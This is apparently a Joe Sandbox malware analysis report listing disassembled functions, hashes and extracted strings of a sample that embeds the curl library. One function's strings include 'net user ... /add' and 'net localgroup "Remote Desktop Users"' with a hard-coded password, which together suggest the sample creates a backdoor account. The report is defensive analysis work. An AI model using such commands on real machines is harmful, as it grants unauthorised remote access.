                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f5b2762244d102ac7151d761480d79947becfbf50fd42f5b2fcfaeb1150ef563
                    • Instruction ID: cfe778ad99d4e32c50bd4b28e16a08855b4dedb37e148cfb25317c2c8da5d17b
                    • Opcode Fuzzy Hash: f5b2762244d102ac7151d761480d79947becfbf50fd42f5b2fcfaeb1150ef563
                    • Instruction Fuzzy Hash: 4331C632E1C10687F7B979298554279D942AF81360FE68039C83D229DDCFEBB44295F0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0e975c92c03be1ccd1aeb7be79c864e6d829d1002b627bd40ad3551951638163
                    • Instruction ID: 7d77ec1ac752ceeb763338b81e9c57b4ff74e87ba95e57aa887f5cad064af7fb
                    • Opcode Fuzzy Hash: 0e975c92c03be1ccd1aeb7be79c864e6d829d1002b627bd40ad3551951638163
                    • Instruction Fuzzy Hash: 80F06871B182AD8BDB989F28A812A297BD5FB08380F80803DD69D83B54D77D94608F54
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f9b57260f47f41705f30453434a158534e477cd275010c4e69d4d1281db591ae
                    • Instruction ID: cc575ee717b6fdeae47399e2e14aa4c19fad89d354175f82af2866db5253f1f0
                    • Opcode Fuzzy Hash: f9b57260f47f41705f30453434a158534e477cd275010c4e69d4d1281db591ae
                    • Instruction Fuzzy Hash: 5BF08524324B6BBEFE01893B0620FAD5E419BC0700FE368758C90424CB8A9E54A3D720
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cde3abcfc0e7fade4db1bd8ce6c94d58eb432cbc668112a4365ac063567ee3ef
                    • Instruction ID: b11c6db0f509ed83a9cd281989f6a579e7504fb82dd5af13f6e8edc12a4c2dd6
                    • Opcode Fuzzy Hash: cde3abcfc0e7fade4db1bd8ce6c94d58eb432cbc668112a4365ac063567ee3ef
                    • Instruction Fuzzy Hash: 0EA01122A0A80A80A3008B00E2A0E20A220FB88B28B808020880C028208E28A0028200
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 88103d8edafb4eabc91e576862a653e6326764067cad33c98d87f9ea2c693a30
                    • Instruction ID: 29c4a30fce345ade8e84b8e628c7fdce9dc49f324af6e61e59c4538815d6b979
                    • Opcode Fuzzy Hash: 88103d8edafb4eabc91e576862a653e6326764067cad33c98d87f9ea2c693a30
                    • Instruction Fuzzy Hash: C4A00121A0890292E754AB44A891160A220EB54710F810035C83D815A49FBCB480E3A4
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: #211$#217
                    • String ID: ;binary$Bad LDAP URL: %s$DN: $LDAP local: %s$LDAP local: Cannot connect to %s:%u$LDAP local: LDAP Vendor = %s ; LDAP Version = %d$LDAP local: bind via ldap_win_bind %s$LDAP local: explicit TLS not supported$LDAP local: trying to establish %s connection$LDAP remote: %s$Microsoft Corporation.$There are more than %d entries$cleartext$encrypted
                    • API String ID: 2221317745-3957863006
                    • Opcode ID: afa5e0c8cbb36f7149ca9228e0a38e1da350dba756543175c963b5dbf3f28fba
                    • Instruction ID: 3edf195141e2399f709e393627abaa33581b604ca8256d471c89ca4c17c66739
                    • Opcode Fuzzy Hash: afa5e0c8cbb36f7149ca9228e0a38e1da350dba756543175c963b5dbf3f28fba
                    • Instruction Fuzzy Hash: 3F12AD66B09B4686FB04EBA6D8502B9B7A0BF45B88F800035DD2D977D5DFBCE405D3A0
                    APIs
                    Strings
                    • P, xrefs: 00007FF7F12F186A
                    • (memory blob), xrefs: 00007FF7F12F17F2
                    • schannel: CertGetCertificateChain trust error CERT_TRUST_REVOCATION_STATUS_UNKNOWN, xrefs: 00007FF7F12F19CE
                    • schannel: failed to create certificate store: %s, xrefs: 00007FF7F12F17C6
                    • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_PARTIAL_CHAIN, xrefs: 00007FF7F12F198F
                    • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_NOT_TIME_VALID, xrefs: 00007FF7F12F19BA
                    • schannel: CertGetCertificateChain error mask: 0x%08lx, xrefs: 00007FF7F12F19DC
                    • schannel: failed to create certificate chain user: %s, xrefs: 00007FF7F12F189A
                    • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_UNTRUSTED_ROOT, xrefs: 00007FF7F12F19A6
                    • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_REVOKED, xrefs: 00007FF7F12F1977
                    • schannel: reusing certificate store from cache, xrefs: 00007FF7F12F1771
                    • schannel: this version of Windows is too old to support certificate verification via CA bundle file., xrefs: 00007FF7F12F1745
                    • schannel: Failed to read remote certificate context: %s, xrefs: 00007FF7F12F1A14
                    • schannel: CertGetCertificateChain failed: %s, xrefs: 00007FF7F12F192D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Cert$Certificate$ChainErrorLast$Free$userStore$CloseContextCreateOpen
                    • String ID: (memory blob)$P$schannel: CertGetCertificateChain error mask: 0x%08lx$schannel: CertGetCertificateChain failed: %s$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_NOT_TIME_VALID$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_PARTIAL_CHAIN$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_REVOKED$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_UNTRUSTED_ROOT$schannel: CertGetCertificateChain trust error CERT_TRUST_REVOCATION_STATUS_UNKNOWN$schannel: Failed to read remote certificate context: %s$schannel: failed to create certificate chain user: %s$schannel: failed to create certificate store: %s$schannel: reusing certificate store from cache$schannel: this version of Windows is too old to support certificate verification via CA bundle file.
                    • API String ID: 3686861598-1548139997
                    • Opcode ID: 6840e7675d4172cfa020f05b2ed9982b8234b58fa473701a1b323c7aa86cb18e
                    • Instruction ID: bd7c5bb0bed99a68639161ebd63b4d9799e3e38e1afaec047d31695e407cc040
                    • Opcode Fuzzy Hash: 6840e7675d4172cfa020f05b2ed9982b8234b58fa473701a1b323c7aa86cb18e
                    • Instruction Fuzzy Hash: CCB1A125B18B4282FB14ABA5D8402BDA3A1BF45B80FD04036DE7D87BD5DFACE505C7A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID: %s auth using %s with user '%s'$%s:%s$%sAuthorization: Basic %s$AWS_SIGV4$Authorization$Authorization: Bearer %s$Basic$Bearer$Digest$NTLM$Negotiate$Proxy$Proxy-$Proxy-authorization$Server
                    • API String ID: 0-3819500859
                    • Opcode ID: 53363949bcef1701e216299b3d3f820223c42d095194676b42ac336a333ea8ef
                    • Instruction ID: 2d1f19fde79791169bc33cafa85a55b09bc2818880a5a82e6d5fdc552cf98a4c
                    • Opcode Fuzzy Hash: 53363949bcef1701e216299b3d3f820223c42d095194676b42ac336a333ea8ef
                    • Instruction Fuzzy Hash: 5591B221B08B8282EB64AB5594403B9A3A5BF447A0FC0413ADB6DC33E5DFBCE545D3A1
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo_noreturn
                    • String ID: /add$ /add$&$eWMhydGcXFEz2CLrVL$net localgroup "Remote Desktop Users" $net user
                    • API String ID: 3668304517-3051407725
                    • Opcode ID: 320914906d27588d1ee88ee69ad92a7b6e5c6fd5ec7e9f230b262226f5fdf961
                    • Instruction ID: 9b74b4d3b5ddb38c0e80c06ccb5815d3429564f8f1ab2ea9e43f87cd586da7de
                    • Opcode Fuzzy Hash: 320914906d27588d1ee88ee69ad92a7b6e5c6fd5ec7e9f230b262226f5fdf961
                    • Instruction Fuzzy Hash: 05D18263F18B8586EB00EB68D5400ADB761FF957E4F905329EABD12AD9DF78D080C790
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ConditionMask$InfoVerifyVersion$AddressHandleModuleProc
                    • String ID: RtlVerifyVersionInfo$ntdll
                    • API String ID: 574519269-1699696460
                    • Opcode ID: 6585a223e4124871821a3ddb8e7e0dbb218b74d36c238672f84001b212f097d1
                    • Instruction ID: 053dad2f0f808b01a213199801dee10ac58246f6eddfa15e16e80c384bee391d
                    • Opcode Fuzzy Hash: 6585a223e4124871821a3ddb8e7e0dbb218b74d36c238672f84001b212f097d1
                    • Instruction Fuzzy Hash: 2951DE21B0C24687E760AB61B814BBAA3A0FF85754F845039DD6E877D4DFBDE4049BA0
                    APIs
                      • Part of subcall function 00007FF7F12ED430: GetModuleHandleA.KERNEL32 ref: 00007FF7F12ED476
                      • Part of subcall function 00007FF7F12ED430: GetProcAddress.KERNEL32 ref: 00007FF7F12ED486
                    • GetModuleHandleA.KERNEL32 ref: 00007FF7F12CE36B
                    • GetProcAddress.KERNEL32 ref: 00007FF7F12CE37B
                      • Part of subcall function 00007FF7F12ED430: VerSetConditionMask.KERNEL32 ref: 00007FF7F12ED541
                      • Part of subcall function 00007FF7F12ED430: VerSetConditionMask.KERNEL32 ref: 00007FF7F12ED553
                      • Part of subcall function 00007FF7F12ED430: VerSetConditionMask.KERNEL32 ref: 00007FF7F12ED565
                      • Part of subcall function 00007FF7F12ED430: VerSetConditionMask.KERNEL32 ref: 00007FF7F12ED577
                      • Part of subcall function 00007FF7F12ED430: VerSetConditionMask.KERNEL32 ref: 00007FF7F12ED58C
                      • Part of subcall function 00007FF7F12ED430: RtlVerifyVersionInfo.NTDLL ref: 00007FF7F12ED5AF
                      • Part of subcall function 00007FF7F12ED430: VerSetConditionMask.KERNEL32 ref: 00007FF7F12ED607
                      • Part of subcall function 00007FF7F12ED430: RtlVerifyVersionInfo.NTDLL ref: 00007FF7F12ED626
                      • Part of subcall function 00007FF7F12C5330: GetLastError.KERNEL32 ref: 00007FF7F12C5359
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ConditionMask$AddressHandleInfoModuleProcVerifyVersion$ErrorLast
                    • String ID: ALPN: curl offers %s$Error setting ALPN$ntdll$schannel: SNI or certificate check failed: %s$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: initial InitializeSecurityContext failed: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$wine_get_version
                    • API String ID: 3979806620-3097429119
                    • Opcode ID: 4bd5211e1340ab23906e2c3816960cabef9cbbde069c521b5fe155b7bb185073
                    • Instruction ID: c12e882179b1f10129d0426cb02da94ce4496664283bc5b42e759f283a4b4b57
                    • Opcode Fuzzy Hash: 4bd5211e1340ab23906e2c3816960cabef9cbbde069c521b5fe155b7bb185073
                    • Instruction Fuzzy Hash: E3D1BD32B08B418AFB10ABA5E8402AEBBA4FB44798F800035DB5C977D5DFBCE555D790
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast$CloseCreateFileHandle
                    • String ID: schannel: CA file exceeds max size of %u bytes$schannel: failed to determine size of CA file '%s': %s$schannel: failed to open CA file '%s': %s$schannel: failed to read from CA file '%s': %s$schannel: invalid path name for CA file '%s': %s
                    • API String ID: 614986841-3430970913
                    • Opcode ID: 9a6808bf741462c6f9bbb8724a313554047b0ce4f20a53530f59e21d1ec77466
                    • Instruction ID: 8fbaefe17baf923bbe914d8105557b2d0c41ca389af97406fac50b4f19353ea1
                    • Opcode Fuzzy Hash: 9a6808bf741462c6f9bbb8724a313554047b0ce4f20a53530f59e21d1ec77466
                    • Instruction Fuzzy Hash: BA519365B0C74282E720AB91E4507AAA690FF4ABD4FC00139DE6E877C5DFFCE50497A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID: %s%02x%02x$AAAA$CNAME: %s$Could not DoH-resolve: %s$DoH: %s type %s for %s$[DoH] A: %u.%u.%u.%u$[DoH] AAAA: $[DoH] TTL: %u seconds$[DoH] hostname: %s$bad error code$unknown
                    • API String ID: 0-228328110
                    • Opcode ID: 13cd3be1005c86a1ec27c892ed69e42b461a9b1031d02d779e985be2e9e3c37b
                    • Instruction ID: f0d17dd46dd9fe6eef72c1938fd8a2e1aed8e903b2f6c650d8b0a9b76bd5b024
                    • Opcode Fuzzy Hash: 13cd3be1005c86a1ec27c892ed69e42b461a9b1031d02d779e985be2e9e3c37b
                    • Instruction Fuzzy Hash: EF02B272B0868286EB20AF54F4443AAB7A0FB447A4F844136DB6D877D5EFBCD541C7A0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: %s (0x%08X)$%s (0x%08X) - %s$CRYPT_E_NOT_IN_REVOCATION_DATABASE$CRYPT_E_NO_REVOCATION_CHECK$CRYPT_E_NO_REVOCATION_DLL$CRYPT_E_REVOCATION_OFFLINE$CRYPT_E_REVOKED$No error$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_I_CONTINUE_NEEDED$Unknown error
                    • API String ID: 1452528299-2168394622
                    • Opcode ID: 889728edff7eba4f92558a5f8e6b9288cf06ad9ecd984fd5a7622ac47b6d3bf3
                    • Instruction ID: b2d5217cefcb15707e84294b4b11752fc60812c05c61b6e2e36c1f5d548e18bd
                    • Opcode Fuzzy Hash: 889728edff7eba4f92558a5f8e6b9288cf06ad9ecd984fd5a7622ac47b6d3bf3
                    • Instruction Fuzzy Hash: 0E518061B0C94286F724BB85A8401B9E3A1AF447A0FC84135DA6D836D1DFFCF585EBB1
                    APIs
                    • CertFreeCertificateContext.CRYPT32 ref: 00007FF7F12CEC6E
                      • Part of subcall function 00007FF7F12C5330: GetLastError.KERNEL32 ref: 00007FF7F12C5359
                      • Part of subcall function 00007FF7F12F1AA0: CertGetNameStringA.CRYPT32 ref: 00007FF7F12F1B8F
                      • Part of subcall function 00007FF7F12F1AA0: CertFreeCertificateContext.CRYPT32 ref: 00007FF7F12F1E46
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Cert$CertificateContextFree$ErrorLastNameString
                    • String ID: SSL: failed retrieving public key from server certificate$SSL: public key does not match pinned public key$schannel: %s$schannel: Failed to read remote certificate context: %s$schannel: SNI or certificate check failed: %s$schannel: failed to receive handshake, SSL/TLS connection failed$schannel: failed to send next handshake data: sent %zd of %lu bytes$schannel: next InitializeSecurityContext failed: %s$schannel: unable to allocate memory$schannel: unable to re-allocate memory
                    • API String ID: 1131146079-413892695
                    • Opcode ID: ca56fa4d74fab9b576665a9abeea60942184a8ff2ebc3d820be9115e7dab8923
                    • Instruction ID: 5815881085ce8cab3be93f5d95ee972fefe4e95fa4511e31f5171216e76d6dc8
                    • Opcode Fuzzy Hash: ca56fa4d74fab9b576665a9abeea60942184a8ff2ebc3d820be9115e7dab8923
                    • Instruction Fuzzy Hash: 4B029072B087828AEB60AF55D4443AABBA0FB44794F804039DB6E977D4DFBCE544D390
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID: *$???$FTP response aborted due to select/poll error: %d$FTP response timeout$QUOT string not accepted: %s$STOP$We got a 421 - timeout$[%s] -> [%s]$getFTPResponse -> result=%d, nread=%zd, ftpcode=%d$getFTPResponse start
                    • API String ID: 1452528299-1133872225
                    • Opcode ID: ada53dd4ba11d9d5ad2f7ac4f63658b13353771e02e34838f9283531d5a767ea
                    • Instruction ID: a3897b7f0178f359f488e64faebdbad4aeb17f3e3fa0b7af3e27e6017b3b866d
                    • Opcode Fuzzy Hash: ada53dd4ba11d9d5ad2f7ac4f63658b13353771e02e34838f9283531d5a767ea
                    • Instruction Fuzzy Hash: E5810622B0C78245FB54AB59E8002B9B355AF857A0FD41139DE6E833D5EFBCE45283E0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID: %s: %s$Date$Host$X-%s-Date$host:%s$x-%s-date:%s
                    • API String ID: 0-2873700390
                    • Opcode ID: 061267563c2cbf6c89a14920a58fef8e25cd05ecdb8686989081c5a19bff024a
                    • Instruction ID: ff753298a6f4638987ce7af31e3fa1b574b3df874e2a231c480d2eaad1d0e21e
                    • Opcode Fuzzy Hash: 061267563c2cbf6c89a14920a58fef8e25cd05ecdb8686989081c5a19bff024a
                    • Instruction Fuzzy Hash: FBF13521B0D68645FB21ABA194503B9E792AF45B94FC84131CEBD873C1EFBEE445C3A4
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: sendto$ErrorLast
                    • String ID: Received ACK for block %d, expecting %d$Timeout waiting for block %d ACK. Retries = %d$tftp_tx: giving up waiting for block %d ack$tftp_tx: internal error, event: %i
                    • API String ID: 4042023021-2715966420
                    • Opcode ID: 4cecff9b31bd1b91d25c690aacf9f9b4849c2dbfbbb99b950167781e55e70fb0
                    • Instruction ID: 2cb6d34f44f9f834642a78518f98651e846fd8087d43768285feb3e2e439a879
                    • Opcode Fuzzy Hash: 4cecff9b31bd1b91d25c690aacf9f9b4849c2dbfbbb99b950167781e55e70fb0
                    • Instruction Fuzzy Hash: 3BA1C4B3B0868186E765AF25D4807E9B7A0FB48F88F444035DE5D8B798DF78D544C7A0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
